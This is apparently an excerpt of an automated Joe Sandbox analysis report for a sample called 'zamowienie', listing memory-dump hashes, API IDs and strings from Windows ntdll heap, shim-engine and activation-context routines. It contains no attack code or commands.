                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 61468042a0f13f0e42c6471ce5342dd6af337288b7ef245c7328d9098d6bc97c
                                                                                                                                              • Instruction ID: b59f563c9fdb017620df586946f23ccc45018802dd5ee4e8362c9fb940bd05c2
                                                                                                                                              • Opcode Fuzzy Hash: 61468042a0f13f0e42c6471ce5342dd6af337288b7ef245c7328d9098d6bc97c
                                                                                                                                              • Instruction Fuzzy Hash: 849002256414005341407168C84490644056FE1215759C522A0999524D8999C96A5666
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 926eed14e16ae76ac8738c927c716f4f9911506755cb2d3cffacf6d2d292bf94
                                                                                                                                              • Instruction ID: 17a4f8db05500ab681d3e7151365d89eb910d9d743b17cd6c6518e3a86b9a9de
                                                                                                                                              • Opcode Fuzzy Hash: 926eed14e16ae76ac8738c927c716f4f9911506755cb2d3cffacf6d2d292bf94
                                                                                                                                              • Instruction Fuzzy Hash: 7590023524180413D1007158C80874704054BD0306F59C412A5165529E8AA5C9966532
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 54fa6452c964ce4c2d6696d29a02f76fcfd09cad91e332d76361c31f9bcd3bf7
                                                                                                                                              • Instruction ID: d6481833019b195ab2f5ea0a24c926f7e6248408f489c81ee4d3722ccb5324da
                                                                                                                                              • Opcode Fuzzy Hash: 54fa6452c964ce4c2d6696d29a02f76fcfd09cad91e332d76361c31f9bcd3bf7
                                                                                                                                              • Instruction Fuzzy Hash: 4690023524180413D1007158C81470B04054BD0306F59C412A1165529D8A65C9566572
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 70e8891de09c6cda8dbe05dac40c9637113c8bd27b8ccff8576d79c10c39e4d8
                                                                                                                                              • Instruction ID: 17136c7c013a1227b50c2a66bc6b52226fa82c7e291f61c632c97392b3478366
                                                                                                                                              • Opcode Fuzzy Hash: 70e8891de09c6cda8dbe05dac40c9637113c8bd27b8ccff8576d79c10c39e4d8
                                                                                                                                              • Instruction Fuzzy Hash: B290026525140053D1047158C40470604454BE1205F59C413A2155528CC969CD665126
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ce89c1cf909fde803cb8da15c9225dba4faddf6ee635ce1dd8aa3ee02138d28b
                                                                                                                                              • Instruction ID: 7cc5b742ee5436d09184ba15afbd2e41ec2947d8ce56aac281f9603a604c67dd
                                                                                                                                              • Opcode Fuzzy Hash: ce89c1cf909fde803cb8da15c9225dba4faddf6ee635ce1dd8aa3ee02138d28b
                                                                                                                                              • Instruction Fuzzy Hash: AB90026538140453D1007158C414B0604058BE1305F59C416E1065528D8A59CD576127
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 33a8aa31ecf8aa7097771ad6b715638364fce60e8fa75a208330c4db04306596
                                                                                                                                              • Instruction ID: 70171edaa97d8f3d5125472961b3dc3665766943deeb7d4127adda8e62e5efd9
                                                                                                                                              • Opcode Fuzzy Hash: 33a8aa31ecf8aa7097771ad6b715638364fce60e8fa75a208330c4db04306596
                                                                                                                                              • Instruction Fuzzy Hash: 59900229261400130145B558860450B08455BD6355399C416F1417564CCA61C96A5322
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9235b3a0d48f5e693d1ae19c1f29b5c22e7bc72f1015399a887485d1a72ce94d
                                                                                                                                              • Instruction ID: c18559c3fa347e359542a40865231837380bcc16896f2dea663b21d25bf71548
                                                                                                                                              • Opcode Fuzzy Hash: 9235b3a0d48f5e693d1ae19c1f29b5c22e7bc72f1015399a887485d1a72ce94d
                                                                                                                                              • Instruction Fuzzy Hash: E3900229251400130105B558870450704464BD5355359C422F1016524CDA61C9665122
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd

                                                                                                                                              Control-flow Graph

                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                              • API String ID: 48624451-2108815105

                                                                                                                                              Control-flow Graph

                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                              • API String ID: 48624451-2108815105

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: HEAP:
                                                                                                                                              • API String ID: 3446177414-2466845122
                                                                                                                                              • Opcode ID: a987c7678fa030cea9c927eb984845c919a6295a8bd377dbe2962e85a324a52e
                                                                                                                                              • Instruction ID: 02a6447f118eb58c9bc3d31e41fe6a4098777a38a1abf7d0cb4c89c21930754c
                                                                                                                                              • Opcode Fuzzy Hash: a987c7678fa030cea9c927eb984845c919a6295a8bd377dbe2962e85a324a52e
                                                                                                                                              • Instruction Fuzzy Hash: 90A179B6A143128FD705CE28C890B1AB7E5FF88750F194A6DE945DB390EB30EC46CB91

                                                                                                                                              Strings
                                                                                                                                              • ExecuteOptions, xrefs: 34F646A0
                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 34F646FC
                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 34F64787
                                                                                                                                              • Execute=1, xrefs: 34F64713
                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34F64655
                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 34F64742
                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34F64725
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                              • Opcode ID: 192f85d7522c66212967efb17e28284c87ba258f87091bf9444287594d0df87c
                                                                                                                                              • Instruction ID: 9e000392c134c81a27a1989c9e28998e11d14ef701456685fe6b617c37f7f690
                                                                                                                                              • Opcode Fuzzy Hash: 192f85d7522c66212967efb17e28284c87ba258f87091bf9444287594d0df87c
                                                                                                                                              • Instruction Fuzzy Hash: 29510879601219AFFB10EAA4DC85FA97BF8EF04344F5808EDD505A7190EB319A47CF54
                                                                                                                                              Strings
                                                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 34F579D0, 34F579F5
                                                                                                                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 34F57AE6
                                                                                                                                              • SsHd, xrefs: 34F0A3E4
                                                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34F579FA
                                                                                                                                              • Actx , xrefs: 34F57A0C, 34F57A73
                                                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34F579D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                              • API String ID: 0-1988757188
                                                                                                                                              • Opcode ID: 19e34db698bf4d5e76d1e17f764c0b7a943b1272c9b8d6b7e319d4669ad0d830
                                                                                                                                              • Instruction ID: 7ce803b03a460ab984fdd4c8d7fcf6eb689402d95707dae87374889a6b1f15c3
                                                                                                                                              • Opcode Fuzzy Hash: 19e34db698bf4d5e76d1e17f764c0b7a943b1272c9b8d6b7e319d4669ad0d830
                                                                                                                                              • Instruction Fuzzy Hash: A2E1AF79A043028FE714CE24C884B1AB7E5FBD4354F588F6DE855CB2A0DB31D94A9F92
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 34F59341, 34F59366
                                                                                                                                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34F59565
                                                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34F5936B
                                                                                                                                              • Actx , xrefs: 34F59508
                                                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34F59346
                                                                                                                                              • GsHd, xrefs: 34F0D874
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                              • API String ID: 3446177414-2196497285
                                                                                                                                              • Opcode ID: 64f63fc708353bfd3009394248b1abfaaacb436ae0c4e39147496a92fedbe133
                                                                                                                                              • Instruction ID: a6aaa0fe6aee788a710e3f2e04bef62ebcac6f11cf75e152e11525fff30c6d7f
                                                                                                                                              • Opcode Fuzzy Hash: 64f63fc708353bfd3009394248b1abfaaacb436ae0c4e39147496a92fedbe133
                                                                                                                                              • Instruction Fuzzy Hash: 5CE1B075604302CFE714CF64C880B1AB7E9BF88358F488E6DE8958B291D771E946DF92
                                                                                                                                              APIs
                                                                                                                                              • RtlDebugPrintTimes.NTDLL ref: 34EE656C
                                                                                                                                                • Part of subcall function 34EE65B5: RtlDebugPrintTimes.NTDLL ref: 34EE6664
                                                                                                                                                • Part of subcall function 34EE65B5: RtlDebugPrintTimes.NTDLL ref: 34EE66AF
                                                                                                                                              Strings
                                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34F49A01
                                                                                                                                              • LdrpInitShimEngine, xrefs: 34F499F4, 34F49A07, 34F49A30
                                                                                                                                              • apphelp.dll, xrefs: 34EE6496
                                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 34F49A2A
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 34F49A11, 34F49A3A
                                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 34F499ED
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 3446177414-204845295
                                                                                                                                              • Opcode ID: ddf65b09afd9308cffe542b69dcc4eb582bd079fff18c1f0f1f6c532444f5ef4
                                                                                                                                              • Instruction ID: 8c61b1a4c500f76977b1c6a2a8f21de3de751d5a1b36261008225f8383da30ba
                                                                                                                                              • Opcode Fuzzy Hash: ddf65b09afd9308cffe542b69dcc4eb582bd079fff18c1f0f1f6c532444f5ef4
                                                                                                                                              • Instruction Fuzzy Hash: 8B518C71718304DFE324CF30D841EAB7BE8EB84654F484D19E595AB2A0DA30D986CF97
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                              • API String ID: 3446177414-4227709934
                                                                                                                                              • Opcode ID: df6452c7d1df36a58bd40027fb25df225d96aa4d58a25dd5b5fca6b3c9ff25a2
                                                                                                                                              • Instruction ID: 21bd94c5132d2013d612e98d7204149e632b892f0aed568e797ffd41d8af4942
                                                                                                                                              • Opcode Fuzzy Hash: df6452c7d1df36a58bd40027fb25df225d96aa4d58a25dd5b5fca6b3c9ff25a2
                                                                                                                                              • Instruction Fuzzy Hash: 91418BB9E00208AFDB01DF99C880ADEBBB5FF58318F180459E901A7341C739A952DBA0
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                              • API String ID: 3446177414-3492000579
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34F49AF6
                                                                                                                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34F49AB4
                                                                                                                                              • LdrpLoadShimEngine, xrefs: 34F49ABB, 34F49AFC
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 34F49AC5, 34F49B06
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 3446177414-3589223738
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                              • API String ID: 3446177414-3224558752
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • HEAP: , xrefs: 34F9F15D
                                                                                                                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 34F9F263
                                                                                                                                              • ---------------------------------------, xrefs: 34F9F279
                                                                                                                                              • Entry Heap Size , xrefs: 34F9F26D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                              • API String ID: 3446177414-1102453626
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                              • API String ID: 3446177414-1222099010
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
